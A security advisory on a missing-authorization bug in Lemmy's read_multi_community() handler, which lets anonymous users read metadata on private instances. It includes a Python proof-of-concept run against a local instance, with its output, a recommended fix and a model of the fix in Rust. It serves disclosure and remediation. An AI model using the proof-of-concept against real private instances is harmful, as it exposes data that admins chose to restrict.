PT-2026-41494 · Crates.Io · Lemmy Api

Published 2026-05-06 · Updated 2026-05-06

CVSS v3.1: 5.3 (Medium)

Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
NOTE: Only affects development version.

Summary

read_multi_community() does not enforce the private-instance setting. On a private instance, an unauthenticated visitor can read multi-community names, titles, summaries, sidebars, owner identities, and member community lists.

Details

Other read handlers load local_site and call check_private_instance() before returning data to unauthenticated callers. read_multi_community() does not call that helper:

```rust
pub async fn read_multi_community(
  Query(data): Query<GetMultiCommunity>,
  context: Data<LemmyContext>,
  local_user_view: Option<LocalUserView>,
) -> LemmyResult<Json<GetMultiCommunityResponse>> {
  // local_site is never loaded and check_private_instance() is never called,
  // so an anonymous caller (local_user_view == None) proceeds straight to the read.
  let my_person_id = local_user_view.as_ref().map(|l| l.person.id);
  let id = resolve_multi_community_identifier(&data.name, data.id, &context, &local_user_view)
    .await?
    .ok_or(LemmyErrorType::NoIdGiven)?;
  let multi_community_view =
    MultiCommunityView::read(&mut context.pool(), id, my_person_id).await?;
  // (remainder of the handler not shown on the page)
```

get_community(), list_posts(), list_comments(), read_person(), search(), and resolve_object() all enforce the private-instance guard.

Proof of Concept

The script creates a multi-community whose metadata contains a marker, turns on private_instance, confirms that a guarded control endpoint blocks unauthenticated callers, then reads the same multi-community over GET /multi_community without authentication.

```python
#!/usr/bin/env python3
"""PoC: read a private instance's multi-community metadata without a session."""
import random
import string

import requests

BASE = "http://127.0.0.1:8536/api/v4"
ADMIN_USER = "lemmy"
ADMIN_PASS = "lemmylemmy"


def api(method, path, token=None, **kw):
    """Send one request to the local Lemmy API, attaching a bearer JWT if given."""
    h = kw.pop("headers", {})
    if token:
        h["Authorization"] = "Bearer " + token
    return requests.request(method, BASE + path, headers=h, **kw)


# Random suffix so repeated runs do not collide on the unique community name.
suffix = "multi" + "".join(random.choice(string.ascii_lowercase) for _ in range(6))
secret = "SECRET_MULTI_" + suffix

admin = api("POST", "/account/auth/login",
            json={"username_or_email": ADMIN_USER, "password": ADMIN_PASS}).json()["jwt"]

# Create a multi-community whose title/summary/sidebar embed the marker.
mid = api("POST", "/multi_community", admin, json={
    "name": "m" + suffix, "title": secret,
    "summary": secret + " summary", "sidebar": secret + " sidebar",
}).json()["multi_community_view"]["multi"]["id"]

# Enable private instance.
api("PUT", "/site", admin, json={"private_instance": True})

print("private instance:", api("GET", "/site").json()["site_view"]["local_site"]["private_instance"])

# Control: a comparable read endpoint correctly rejects unauthenticated callers.
control = api("GET", "/community/list")
print("unauth /community/list (control):", control.status_code, control.text[:120])

# Leak: read_multi_community returns the private metadata to an unauthenticated caller.
leak = api("GET", "/multi_community", params={"id": mid})
print("unauth /multi_community:", leak.status_code, leak.text[:300])
print("contains secret:", secret in leak.text)
```

Output:

```text
private instance: True
unauth /community/list (control): 400 {"error":"instance is private","cause":"InstanceIsPrivate"}
unauth /multi_community: 200 {"multi_community_view":{"multi":{"title":"SECRET_MULTI_multijwxokm","summary":"SECRET_MULTI_multijwxokm summary","sidebar":"SECRET_MULTI_multijwxokm sidebar"}}}
contains secret: True
```
The control request shows the privacy setting is active. The multi-community endpoint still returns the private metadata.

Impact

An unauthenticated visitor can read multi-community metadata from an instance whose admin configured the site as private. The exposed fields include names, titles, summaries, sidebars, owner identities, and member community lists.

Recommended Fix

Load local_site at the start of read_multi_community() and call check_private_instance(&local_user_view, &local_site)? before resolving or reading the multi-community. Placing the guard ahead of resolve_multi_community_identifier() matters: if it ran only after the lookup, an anonymous caller on a private instance could still distinguish NoIdGiven from a successful resolution and probe which names or ids exist.
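The following is an added, self-contained model of the fix, not Lemmy's own code: the struct names (LocalSite, LocalUserView, MultiCommunityView, LemmyErrorType) and the in-memory Store are minimal stand-ins for the real types, and the guard mirrors the behaviour the page describes (anonymous caller plus private_instance = InstanceIsPrivate). It puts the unguarded handler shape beside the guarded one so the difference, including the guard running before the lookup, can be checked directly.

```rust
// Added example (not Lemmy's code): a minimal model of the private-instance
// guard and of the vulnerable vs. fixed read_multi_community() shapes.
// All types here are stand-ins for the real Lemmy structs.
use std::collections::HashMap;

#[derive(Debug, Clone, PartialEq)]
pub enum LemmyErrorType {
    InstanceIsPrivate,
    NotFound,
}

pub type LemmyResult<T> = Result<T, LemmyErrorType>;

/// Admin-controlled site row; only the field the guard consults.
pub struct LocalSite {
    pub private_instance: bool,
}

/// Some(..) when the request carried a valid session, None for anonymous callers.
pub struct LocalUserView {
    pub person_id: i32,
}

#[derive(Debug, Clone, PartialEq)]
pub struct MultiCommunityView {
    pub id: i32,
    pub name: String,
    pub title: String,
    pub sidebar: String,
    pub owner_person_id: i32,
}

/// Guard with the same contract as Lemmy's check_private_instance():
/// anonymous caller on a private instance is rejected, everything else passes.
pub fn check_private_instance(
    local_user_view: &Option<LocalUserView>,
    local_site: &LocalSite,
) -> LemmyResult<()> {
    if local_user_view.is_none() && local_site.private_instance {
        return Err(LemmyErrorType::InstanceIsPrivate);
    }
    Ok(())
}

/// Stand-in for the database pool: the site row plus id -> multi-community.
pub struct Store {
    pub local_site: LocalSite,
    pub multis: HashMap<i32, MultiCommunityView>,
}

/// Vulnerable shape: resolve and return without ever consulting local_site.
pub fn read_multi_community_unguarded(
    store: &Store,
    id: i32,
    _local_user_view: &Option<LocalUserView>,
) -> LemmyResult<MultiCommunityView> {
    store.multis.get(&id).cloned().ok_or(LemmyErrorType::NotFound)
}

/// Fixed shape: guard first, before the lookup, so a private instance leaks
/// neither the metadata nor whether the requested id exists.
pub fn read_multi_community_guarded(
    store: &Store,
    id: i32,
    local_user_view: &Option<LocalUserView>,
) -> LemmyResult<MultiCommunityView> {
    check_private_instance(local_user_view, &store.local_site)?;
    store.multis.get(&id).cloned().ok_or(LemmyErrorType::NotFound)
}

/// Constructed fixture: a private instance holding one multi-community (id 7).
pub fn private_store() -> Store {
    let mut multis = HashMap::new();
    multis.insert(
        7,
        MultiCommunityView {
            id: 7,
            name: "mexample".into(),
            title: "SECRET_MULTI".into(),
            sidebar: "SECRET_MULTI sidebar".into(),
            owner_person_id: 1,
        },
    );
    Store { local_site: LocalSite { private_instance: true }, multis }
}

fn main() {
    let store = private_store();
    let anon: Option<LocalUserView> = None;
    let user = Some(LocalUserView { person_id: 1 });
    println!("unguarded, anonymous: {:?}", read_multi_community_unguarded(&store, 7, &anon));
    println!("guarded, anonymous:   {:?}", read_multi_community_guarded(&store, 7, &anon));
    println!("guarded, logged in:   {:?}", read_multi_community_guarded(&store, 7, &user));
}
```

Running it shows the unguarded call handing the SECRET_MULTI title to the anonymous caller while the guarded call returns InstanceIsPrivate; a logged-in caller still gets the view, and once private_instance is false anonymous reads behave as before.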

Found by aisafe.io

Weakness Enumeration

Missing Authorization

Related Identifiers

GHSA-JMXC-HHWX-GVV3

Affected Products

Lemmy Api